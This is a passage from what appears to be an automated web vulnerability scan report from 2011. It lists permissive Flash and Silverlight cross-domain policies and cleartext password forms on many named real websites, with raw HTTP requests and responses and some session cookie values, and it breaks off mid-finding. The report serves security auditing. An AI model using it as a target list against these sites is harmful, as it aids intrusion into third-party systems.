Host:	http://www.maysville-online.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.maysville-online.com

Response

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2045040
Content-Type: text/x-cross-domain-policy; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 10:47:37 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.034
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp6
Content-Length: 315

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="bloximages.chicago2.vip.townnews.com" to-ports="80" secure="false"/>
...[SNIP]...

7.272. http://www.mrclean.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mrclean.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mrclean.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:22 GMT
ETag: W/"276-1300876182000"
Last-Modified: Wed, 23 Mar 2011 10:29:42 GMT
Content-Type: application/xml
Content-Length: 276
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="http://media.mrclean.com" />
<allow-access-from domain="media.mrclean.com" />
...[SNIP]...

7.273. http://www.myepets.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myepets.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myepets.com

Response

HTTP/1.1 200 OK
Content-Length: 369
Content-Type: text/xml
Last-Modified: Mon, 04 Jan 2010 18:49:11 GMT
Accept-Ranges: bytes
ETag: "472fb89a6e8dca1:e09"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:47:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/
...[SNIP]...
<allow-access-from domain="174.143.20.36" />
...[SNIP]...

7.274. http://www.neaq.org/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neaq.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.neaq.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:45:10 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Tue, 25 May 2010 18:50:44 GMT
ETag: "2c20e34-16a-a27c0900"
Accept-Ranges: bytes
Content-Length: 362
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="www.neaq.org"/>
   <allow-acces
...[SNIP]...
<allow-access-from domain="www.liveblueinitiative.org"/>
   <allow-access-from domain="liveblueinitiative.org"/>
...[SNIP]...

7.275. http://www.neatco.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neatco.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.neatco.com

Response

HTTP/1.1 200 OK
Content-Length: 265
Content-Type: text/xml
Content-Location: http://www.neatco.com/crossdomain.xml
Last-Modified: Sat, 20 Nov 2010 09:00:54 GMT
Accept-Ranges: bytes
ETag: "4e1946709188cb1:17ac"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:28:21 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policySYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="dev.12days.com" />
<allow-access-from domain="staging.redtettemer.com" />
...[SNIP]...

7.276. http://www.pecentral.org/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pecentral.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pecentral.org

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 10:33:00 GMT
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Wed, 02 Sep 2009 11:36:12 GMT
ETag: "d0d1d892c12bca1:b20"
Content-Length: 523

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="www.pecentral.org" /> <allow-access-from domain="test.pecentral.org" /> <allow-access-from domain="pecentral.org" /> <allow-access-from domain="peclogit.org" /> <allow-access-from domain="www.peclogit.org" /> <allow-access-from domain="www.pecchallenge.org" /> <allow-access-from domain="pecchallenge.org" />
...[SNIP]...

7.277. http://www.primos.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primos.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.primos.com

Response

HTTP/1.1 200 OK
Content-Length: 420
Content-Type: text/xml
Last-Modified: Wed, 02 Mar 2011 14:56:03 GMT
Accept-Ranges: bytes
ETag: "80833cf3e9d8cb1:1d21"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:40:40 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="http://primos.com/HomePageVideoDataFeed.aspx" />
<allow-access-from domain="http://primos.com" />
<allow-access-from domain="primos.com/HomePageVideoDataFeed.aspx" />
<allow-access-from domain="primos.com" />
...[SNIP]...

7.278. http://www.rifftrax.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rifftrax.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rifftrax.com

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/xml
Last-Modified: Fri, 04 Feb 2011 16:01:17 GMT
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:48:47 GMT
X-AH-Environment: prod
Content-Length: 226
Date: Tue, 03 May 2011 10:48:47 GMT
X-Varnish: 1231549118
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="rifftrax.com" />

...[SNIP]...

7.279. http://www.samstowntunica.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.samstowntunica.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.samstowntunica.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:36 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 11 Jun 2008 21:40:28 GMT
ETag: "88005-dc-e4a52b00"
Accept-Ranges: bytes
Content-Length: 220
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="static.boydgaming.net" /></cr
...[SNIP]...

7.280. http://www.scott-sports.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scott-sports.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scott-sports.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:30:23 GMT
Server: Apache
Last-Modified: Thu, 10 Dec 2009 18:08:00 GMT
ETag: "fe4a36-1a3-47a63b0004000"
Accept-Ranges: bytes
Content-Length: 419
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>

<cross-domain-policy>
   <allow-access-from domain="scottflash.s3.amazonaws.com" />
   <allow-access-from domain="flash.scottusa.com" />
   <allow-access-from domain="flash.scott-sports.com" />
   <allow-access-from domain="d2qcdwiuv3wbom.cloudfront.net" />
   <allow-access-from domain="scottusa_redesign" />
...[SNIP]...

7.281. http://www.stjohnprovidence.org/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stjohnprovidence.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stjohnprovidence.org

Response

HTTP/1.1 200 OK
Content-Length: 495
Content-Type: text/xml
Last-Modified: Mon, 18 Apr 2011 16:57:28 GMT
Accept-Ranges: bytes
ETag: "eae21fb3e9fdcb1:355"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:34:11 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="www.stjohnprovidence
...[SNIP]...
<allow-access-from domain="stjohnprovidence.org" />
    <allow-access-from domain="stjohnredesign.live.biznetis.net" />
    <allow-access-from domain="stjohnblue2009.live.biznetis.net" />
    <allow-access-from domain="stjohn.live.biznetis.net" />
...[SNIP]...

7.282. http://www.supermotors.net/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.supermotors.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.supermotors.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:04:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 PHP/4.4.9 mod_fastcgi/2.4.6
Last-Modified: Thu, 08 Apr 2010 22:50:03 GMT
ETag: "9a3834c-16a-483c17fce5cc0"
Accept-Ranges: bytes
Content-Length: 362
Connection: close
Content-Type: application/xml

...<?xml version="1.0"?>

<!--
This file should be copied to the root of another domains where you want to download/upload files.
See "Cross domain security" section in manual for extra info.
...[SNIP]...
<allow-access-from domain="supermotors.net" />
...[SNIP]...

7.283. http://www.theknackkids.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theknackkids.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.theknackkids.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:25:05 GMT
Server: Apache
Content-Length: 288
Cache-Control: public;max-age=86400
Expires: Wed, 04 May 2011 10:25:05 GMT
Last-Modified: Sat, 30 Apr 2011 02:48:37 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="demandware.edgesuite.net" />
<allow-access-from domain="michaels.liquifire.com" />
...[SNIP]...

7.284. http://www.virtualrabbit.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.virtualrabbit.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.virtualrabbit.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:11:07 GMT
Server: Apache
Last-Modified: Mon, 30 Nov 2009 20:23:30 GMT
ETag: "21011d7-144-4799c6a2c7480"
Accept-Ranges: bytes
Content-Length: 324
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policySYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.virtualrabbit.com" />
...[SNIP]...
<allow-access-from domain="virtualrabbit.com" />
<allow-access-from domain="dev.ndevix.com" />
...[SNIP]...

7.285. http://www.wendoverfun.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wendoverfun.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wendoverfun.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sat, 27 Feb 2010 01:01:26 GMT
Accept-Ranges: bytes
ETag: "f011926348b7ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:22:43 GMT
Connection: close
Content-Length: 243

<?xml version="1.0" encoding="iso-8859-1"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.wendoverfun.com"/>
<allow-access-from domain="wendoverfun.com"/>
...[SNIP]...

8. Silverlight cross-domain policy previous next
There are 14 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://ads.pointroll.com/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml
http://b.voicefive.com/clientaccesspolicy.xml
http://c.yardbarker.com/clientaccesspolicy.xml
http://leeenterprises.112.2o7.net/clientaccesspolicy.xml
http://spe.atdmt.com/clientaccesspolicy.xml
http://speed.pointroll.com/clientaccesspolicy.xml
http://www.blueangels.navy.mil/clientaccesspolicy.xml
http://www.chessbase.com/clientaccesspolicy.xml
http://www.maxdome.de/clientaccesspolicy.xml
http://www.towsontigers.com/clientaccesspolicy.xml
http://www.marca.com/clientaccesspolicy.xml
http://www.montgomerycountytn.org/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

8.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Tue, 03 May 2011 15:41:23 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.2. http://ads.pointroll.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:131d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 03 May 2011 15:43:36 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

8.3. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 04 May 2011 15:41:33 GMT
Date: Tue, 03 May 2011 15:41:33 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

8.4. http://b.voicefive.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 04 May 2011 15:42:35 GMT
Date: Tue, 03 May 2011 15:42:35 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

8.5. http://c.yardbarker.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.yardbarker.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: c.yardbarker.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 03 May 2011 17:09:24 GMT
Connection: keep-alive
Content-Length: 340

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<g
...[SNIP]...

8.6. http://leeenterprises.112.2o7.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://leeenterprises.112.2o7.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: leeenterprises.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:48 GMT
Server: Omniture DC/2.0.0
xserver: www177
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8.7. http://spe.atdmt.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://spe.atdmt.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Sun, 08 May 2011 15:20:01 GMT
Date: Tue, 03 May 2011 15:42:04 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.8. http://speed.pointroll.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://speed.pointroll.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:43:37 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

8.9. http://www.blueangels.navy.mil/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.blueangels.navy.mil
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.blueangels.navy.mil

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 10:37:04 GMT
Content-Type: text/xml
Last-Modified: Wed, 13 Apr 2011 16:37:19 GMT
Accept-Ranges: bytes
ETag: "40ab72ef9f9cb1:7b2c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 351

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*" />
</allow-from>

...[SNIP]...

8.10. http://www.chessbase.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.chessbase.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.chessbase.com

Response

HTTP/1.1 200 OK
Content-Length: 337
Content-Type: text/xml
Last-Modified: Thu, 28 Jan 2010 13:00:17 GMT
Accept-Ranges: bytes
ETag: "3cfae4d619a0ca1:17b8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:25:48 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...

8.11. http://www.maxdome.de/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.maxdome.de
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.maxdome.de

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:13:20 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 15:01:32 GMT
ETag: "ea7b6-17a-4a15ae66eeb00"
Accept-Ranges: bytes
Content-Length: 378
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allo
...[SNIP]...

8.12. http://www.towsontigers.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.towsontigers.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.towsontigers.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:37:35 GMT
Server: Apache
Last-Modified: Thu, 26 Mar 2009 08:16:48 GMT
ETag: "18a-466013cce5c00"
Accept-Ranges: bytes
Content-Length: 394
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="https://*"/>
<domain uri="http://*"/>
...[SNIP]...

8.13. http://www.marca.com/clientaccesspolicy.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.marca.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.marca.com

Response

HTTP/1.1 200 OK
Server: Apache
Date: Tue, 03 May 2011 10:47:04 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Thu, 03 Dec 2009 18:59:46 GMT
ETag: "20a4ce-361-4b180aa2"
Accept-Ranges: bytes
Content-Length: 865

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">

<domain uri="95.18.41.165"/>
...[SNIP]...
<domain uri="*.elmundo.es" />
<domain uri="*.el-mundo.net" />
<domain uri="*.elmundo.int" />
<domain uri="*.internet.int" />
<domain uri="*.agilbanner.com" />
<domain uri="*.marca.com" />
<domain uri="217.116.2.35" />
<domain uri="*.telva.com" />
<domain uri="*.latiendademarca.com" />
<domain uri="*.expansion.com" />
<domain uri="*.recoletos.es" />
...[SNIP]...

8.14. http://www.montgomerycountytn.org/clientaccesspolicy.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.montgomerycountytn.org
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.montgomerycountytn.org

Response

HTTP/1.1 200 OK
Content-Length: 402
Content-Type: text/xml
Last-Modified: Mon, 22 Feb 2010 14:05:44 GMT
Accept-Ranges: bytes
ETag: "0ecb01fc8b3ca1:731d"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:20:46 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://localhost" />
<domain uri="https://localhost" />
...[SNIP]...

9. Cleartext submission of password previous next
There are 7 instances of this issue:

http://www.ascp.org/favicon.ico
http://www.bikersingle.com/favicon.ico
http://www.extrabux.com/favicon.ico
http://www.restaurantrow.com/favicon.ico
http://www.voa.org/favicon.ico
http://www.xcomment.com/favicon.ico
http://www.xcomment.com/favicon.ico

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

9.1. http://www.ascp.org/favicon.ico previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ascp.org
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ascp.org/favicon.ico.aspx

The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ascp.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 20586
Date: Tue, 03 May 2011 11:11:40 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Cache-Control: private
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2ozewi45cdiw1ufczpqhh455; path=/; HttpOnly
X-Powered-By: ASP.NET
Set-Cookie: BNES_ASP.NET_SessionId=61sKBjDiH0nv9Kyol+DTKsloxz8QvKgnddAWbHgCmkvMIHyz+CwsCSxXnBCgRKBgz1tM4CZGZSCwiefHY+OBvNw6t4Cpb/L3OCiNDaAk1D4=; path=/; HttpOnly

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head><meta http-equiv="
...[SNIP]...
<body>

<form name="form1" method="post" action="favicon.ico.aspx" id="form1">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTQ5MDU5ODcyOA9kFgICAw9kFgICFQ9kFgJmD2QWAgIHDw8WAh4ISW1hZ2VVcmwFES9JbWFnZXMvbG9naW4uZ2lmZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmF
...[SNIP]...
<div class="PasswordTextBox"><input name="Login$PasswordTextBox" type="password" id="Login_PasswordTextBox" class="loginfield" />  </div>
...[SNIP]...

9.2. http://www.bikersingle.com/favicon.ico previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bikersingle.com
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bikersingle.com/login.asp?logintimes=1

The form contains the following password field:

password

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bikersingle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

